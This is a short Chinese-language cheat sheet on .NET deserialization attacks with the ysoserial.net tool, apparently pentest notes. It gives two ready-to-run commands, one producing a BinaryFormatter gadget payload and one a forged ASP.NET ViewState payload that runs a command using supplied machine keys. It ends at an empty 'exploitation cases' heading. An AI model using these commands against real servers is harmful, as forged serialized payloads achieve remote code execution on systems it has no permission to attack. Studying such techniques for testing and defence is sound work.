【反序列化】ysoserial.net

1. 快速利用

.\ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "cacl.exe"
./ysoserial.exe -p ViewState -g TextFormattingRunProperties  -c "ping -n 4 10.10.14.87  " --path="/Download.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="xxxxx" --validationalg="SHA1" --validationkey="xxxxxx"

2. 利用案例: